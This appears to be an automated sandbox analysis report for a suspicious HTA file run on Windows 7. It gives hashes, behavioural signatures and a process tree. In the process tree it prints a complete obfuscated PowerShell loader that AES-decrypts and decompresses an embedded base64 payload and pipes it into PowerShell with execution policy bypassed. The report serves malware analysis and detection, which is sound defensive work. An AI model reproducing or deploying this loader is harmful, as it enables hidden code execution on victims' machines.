Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    05-02-2024 14:09

General

  • Target

    05022024_2209_singer.hta

  • Size

    72KB

  • MD5

    85c97d1919e8f1936ff6930495892788

  • SHA1

    c547a5c5781d415bbec71189c48ac465a14514a1

  • SHA256

    fd77b8c213b4a3629abca71de153ddb41b49eff69d781b2222efc16cec7dd04b

  • SHA512

    618ebfb23e191c6b03da8ff1e2eca1db378c2ba0f1475d927d00c3a3459e18345c597901d6c622b6e7697db2739924911c9c8ff9d62d19e23dd0e5bb74f45c78

  • SSDEEP

    768:W5sZHTGIH559B0P2pD4Lxj3COqibKnZw/OMN38u1LuvLutoLuV6lYWlY6CJNc1nT:syHKIHz9KP2SLxzj2LBdti5Oz

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\05022024_2209_singer.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gPcKLP = 'AAAAAAAAAAAAAAAAAAAAAEOe1cGTw6FIhVh/QrSMTFJsLkEmx+7VpDV75soo44Xjdoou/gadRv2ptrh1eyowo32jDkJQWIknw9z9eGEASjim8eUsr+iiDt+Gct7uUpEmFrWCP76BB1Cg0KKx0WQlrQJPpv8tYcP+nuI68unNsQgKBhhaMqg4Ou8fdShXjyIUb1O1Cb9CmKoPd891C0RQ3y4FWa07shVCaJHnFdmVEvjhxagF1qVUsx6xC6YMgl3nja922t2x/5SOyqfXR5JLkG6Xb6sKuNaR6QGS2SqteqIAE1vfs9GxXoIUJdarAKngnf1EEFUrDfctZlSR5zT6GLBAZ3kgFZgXH5XxlTf6tcteKZwZS+5X4SlH/spRa84FoPzGZg97K06YSPSft9fcpt7VRhi8ReddyJySyS4F80ZNbvJJrKX7afVObWkzQoASpxWcmgNOQpGJ4ismROQ028geyBvMpcF0Na2L2+fA8kTj6MFPTXF5ELvcldBetLM7umjFZu48uOtlUGPiZSI5Wi1z6pUaJxT8IwxgmefwtXqgTkSXxhfyZoOpb36yMcXCa9W5n0MeGRnBsFFZMawKjOI7HFvVWQhnEXb7yh4kDtwkLDbhOJXtwkeLWJN/OOxEEiA/dza1N5jbhWku9IFWIe/rbKblK7A859gC/pjQd5h0qz4rBdgieeO3GGFAkETIhs+3J1NcMZSf/zbVERD7tY7Mat17qjwa4pFiS8KLv7KI9cYLR/mrJDzBBNXWLqZiJunl8sSYoAdNKNS5niyohs7B3HV73Nf91Mf9GCXDNjt5BcGqqFFHiW6qlxM166yQ41WBsSZP77t/XhpZNGmRPhx84Cfqap6AYmu/N3KfsnY7HQLGmgn9hVJRLskm9I0zf83dhSATZUDBTyCbWPgYaWmWi5LnYe2qtPULS/UhIh4ETTgc33roMdNgLk8Ssfwbt1kqev2L8aSn+FqgADYkufhXrehPAhR+LFQkn9ePGHwMzPxsEVETt2GkqztZUPUx';$EbCNQP = 'S01NeWhUamJYR1B5aWZyUnpwd0lGQXhYUnlvQW11QkI=';$nbGhvR = New-Object 'System.Security.Cryptography.AesManaged';$nbGhvR.Mode = [System.Security.Cryptography.CipherMode]::ECB;$nbGhvR.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$nbGhvR.BlockSize = 128;$nbGhvR.KeySize = 256;$nbGhvR.Key = [System.Convert]::FromBase64String($EbCNQP);$Tpgvz = [System.Convert]::FromBase64String($gPcKLP);$gBOLPdWT = $Tpgvz[0..15];$nbGhvR.IV = $gBOLPdWT;$QcGcbsNZr = $nbGhvR.CreateDecryptor();$RaMEzyHzB = $QcGcbsNZr.TransformFinalBlock($Tpgvz, 16, $Tpgvz.Length - 16);$nbGhvR.Dispose();$tlVz = New-Object System.IO.MemoryStream( , $RaMEzyHzB );$znrzbVZ = New-Object System.IO.MemoryStream;$GdzwFAYYz = New-Object System.IO.Compression.GzipStream $tlVz, ([IO.Compression.CompressionMode]::Decompress);$GdzwFAYYz.CopyTo( $znrzbVZ );$GdzwFAYYz.Close();$tlVz.Close();[byte[]] $mYCOjpH = $znrzbVZ.ToArray();$iMhDGLOW = [System.Text.Encoding]::UTF8.GetString($mYCOjpH);$iMhDGLOW | powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    d1c0a975af3686288fefb1dbbe4cab68

    SHA1

    2e9cff57cbe01eca85c9011b2185928e2460afe0

    SHA256

    cf25a52aab796619b66eaa322def3178cc9192fa7b97af3043cbd7aec0bd5291

    SHA512

    fd0b6388cb3435df03c7ab17dd7746f78ba7c1a4f71464017472f614ac16d88616ee49dfc4ec23dedb7871371a8735ad7977c13e58c8cd533fa9eaa437b0b80b

  • memory/2696-10-0x00000000720F0000-0x000000007269B000-memory.dmp

    Filesize

    5.7MB

  • memory/2696-11-0x00000000720F0000-0x000000007269B000-memory.dmp

    Filesize

    5.7MB

  • memory/2696-12-0x00000000720F0000-0x000000007269B000-memory.dmp

    Filesize

    5.7MB

  • memory/2768-2-0x00000000720F0000-0x000000007269B000-memory.dmp

    Filesize

    5.7MB

  • memory/2768-3-0x0000000002750000-0x0000000002790000-memory.dmp

    Filesize

    256KB

  • memory/2768-4-0x0000000002750000-0x0000000002790000-memory.dmp

    Filesize

    256KB

  • memory/2768-13-0x00000000720F0000-0x000000007269B000-memory.dmp

    Filesize

    5.7MB